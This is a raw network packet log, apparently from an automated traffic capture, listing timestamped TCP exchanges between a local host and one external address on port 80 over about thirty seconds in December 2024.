                                                                                                                  Dec 5, 2024 10:53:33.813188076 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.931857109 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.932049036 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.932118893 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.932337999 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:34.052050114 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:34.159106016 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:34.278862000 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:34.278956890 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:34.283932924 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:34.403753042 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.050003052 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.096358061 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.170809984 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.221303940 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.285732031 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.330703974 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.405895948 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.455679893 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.531600952 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.531794071 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.532007933 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.651608944 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.651684046 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.651715040 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.651793957 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.652005911 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.652065039 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.652261019 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.771682978 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:36.002718925 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:36.122550964 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:36.889818907 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:36.940042973 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.125454903 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:37.174421072 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.250484943 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.370436907 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:37.370515108 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.370738983 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.490540981 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:37.750035048 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.870045900 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:38.607925892 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:38.658787012 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:38.841646910 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:38.893168926 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:38.968492985 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:38.968787909 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.088535070 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:39.088612080 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.088669062 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:39.088768005 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.088969946 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.208636045 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:39.440166950 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.560082912 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.327800989 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.377552986 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.385412931 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.385687113 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.505372047 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.505814075 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.505913973 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.508764982 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.566241026 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.686192989 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.952542067 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:41.027368069 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:41.072427034 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:41.072442055 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:41.147245884 CET8049762193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:41.147329092 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:41.147509098 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:41.267174959 CET8049762193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:41.502707005 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:41.622538090 CET8049762193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:41.755453110 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:41.799499035 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:41.993649960 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:42.033991098 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.385531902 CET8049762193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:42.440123081 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.617727041 CET8049762193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:42.658811092 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.733875990 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.733952999 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.734286070 CET4976380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.854130030 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:42.854162931 CET8049763193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:42.854263067 CET4976380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.854263067 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.854571104 CET8049762193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:42.854708910 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.855597973 CET4976380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:42.975632906 CET8049763193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:43.205878973 CET4976380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:43.325769901 CET8049763193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:44.100519896 CET8049763193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:44.143249989 CET4976380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:44.337546110 CET8049763193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:44.338491917 CET4976380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:44.455291986 CET4976480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:44.458651066 CET8049763193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:44.458704948 CET4976380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:44.575097084 CET8049764193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:44.575208902 CET4976480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:44.580044985 CET4976480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:44.699871063 CET8049764193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:44.924592018 CET4976480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:45.044471025 CET8049764193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:45.814090014 CET8049764193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:45.861958027 CET4976480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:46.049483061 CET8049764193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:46.096324921 CET4976480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:46.173021078 CET4976480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:46.173305035 CET4976580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:46.293098927 CET8049765193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:46.293222904 CET8049764193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:46.293319941 CET4976480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:46.293327093 CET4976580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:46.295015097 CET4976580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:46.415358067 CET8049765193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:46.643309116 CET4976580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:46.763129950 CET8049765193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.003613949 CET4976680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.003978014 CET4976580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.123450041 CET8049766193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.124835014 CET4976680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.124984980 CET4976680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.125874043 CET4976780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.165473938 CET8049765193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.244823933 CET8049766193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.245672941 CET8049767193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.246049881 CET4976780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.246284008 CET4976780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.261548996 CET8049765193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.262120962 CET4976580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.366039991 CET8049767193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.471735954 CET4976680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.591592073 CET8049766193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.591658115 CET8049766193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:47.596373081 CET4976780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:47.716090918 CET8049767193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:48.371664047 CET8049766193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:48.424451113 CET4976680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.483824968 CET8049767193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:48.533813000 CET4976780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.605647087 CET8049766193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:48.658829927 CET4976680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.717506886 CET8049767193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:48.768207073 CET4976780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.844310999 CET4976680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.844531059 CET4976780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.844700098 CET4976880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.965254068 CET8049768193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:48.965270996 CET8049766193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:48.965281963 CET8049767193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:48.965405941 CET4976680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.965425968 CET4976780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.965445042 CET4976880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:48.965683937 CET4976880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:49.085429907 CET8049768193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:49.315287113 CET4976880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:49.435745955 CET8049768193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:50.204859972 CET8049768193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:50.252688885 CET4976880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:50.437592983 CET8049768193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:50.486951113 CET4976880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:50.566731930 CET4976980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:50.686582088 CET8049769193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:50.686661005 CET4976980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:50.686804056 CET4976980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:50.807554960 CET8049769193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:51.033956051 CET4976980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:51.153772116 CET8049769193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:51.924709082 CET8049769193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:51.971577883 CET4976980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:52.157598019 CET8049769193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:52.205800056 CET4976980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:52.282377958 CET4976980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:52.282670021 CET4977080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:52.403158903 CET8049770193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:52.403230906 CET4977080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:52.403414965 CET4977080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:52.403609037 CET8049769193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:52.403660059 CET4976980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:52.523225069 CET8049770193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:52.752778053 CET4977080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:52.872590065 CET8049770193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:53.612966061 CET4977080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.613061905 CET4977180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.640650034 CET8049770193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:53.640718937 CET4977080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.732893944 CET8049771193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:53.733185053 CET8049770193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:53.733292103 CET4977080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.733421087 CET4977180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.733421087 CET4977180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.734422922 CET4977280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.853152990 CET8049771193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:53.854173899 CET8049772193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:53.854255915 CET4977280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.854407072 CET4977280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:53.974209070 CET8049772193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:54.080806971 CET4977180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:54.200830936 CET8049771193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:54.200848103 CET8049771193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:54.227942944 CET4977280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:54.348361969 CET8049772193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:54.971354961 CET8049771193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:55.018215895 CET4977180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.099199057 CET8049772193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:55.143196106 CET4977280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.205805063 CET8049771193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:55.245676041 CET4977180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.337575912 CET8049772193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:55.393218994 CET4977280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.456701040 CET4977180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.456728935 CET4977280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.457048893 CET4977480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.576836109 CET8049774193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:55.576908112 CET4977480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.576955080 CET8049771193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:55.577002048 CET4977180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.577035904 CET8049772193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:55.577076912 CET4977280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.577171087 CET4977480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:55.697232008 CET8049774193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:55.924618959 CET4977480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:56.044579983 CET8049774193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:56.814743996 CET8049774193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:56.861974955 CET4977480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:57.049464941 CET8049774193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:57.052966118 CET4976880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:57.096391916 CET4977480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:57.172096014 CET4977680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:57.292267084 CET8049776193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:57.295190096 CET4977680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:57.295377970 CET4977680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:57.480499029 CET8049776193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:57.643596888 CET4977680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:57.763376951 CET8049776193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:58.534506083 CET8049776193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:58.580712080 CET4977680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:58.769474983 CET8049776193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:58.818947077 CET4977680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:58.891860008 CET4977680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:58.892206907 CET4978280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:59.011938095 CET8049782193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:59.011972904 CET8049776193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:59.012012005 CET4978280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:59.012048960 CET4977680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:59.012243986 CET4978280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:59.131910086 CET8049782193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:59.362354994 CET4978280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:59.482264042 CET8049782193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.222517967 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.222803116 CET4978280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.249665022 CET8049782193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.250966072 CET4978280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.342298985 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.342525005 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.342576027 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.342746973 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.343225956 CET8049782193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.343281031 CET4978280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.462991953 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.463067055 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.463274002 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.463320017 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.583136082 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.690269947 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.810075998 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.810098886 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.815298080 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.935331106 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.580931902 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.627897024 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:01.700419903 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.752685070 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:01.813365936 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.862085104 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:01.933358908 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.986967087 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.058713913 CET4977480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.062325001 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.062391996 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.062736988 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.182332993 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:02.182400942 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:02.182404995 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.182488918 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.182672024 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.182737112 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:02.182795048 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.304013968 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:02.533929110 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.653800964 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:03.423392057 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:03.471482038 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:03.657381058 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:03.721338034 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:03.976929903 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:03.977839947 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.097584963 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:04.097657919 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.097703934 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:04.097769976 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.097999096 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.217690945 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:04.456852913 CET4979680192.168.2.4193.3.168.50
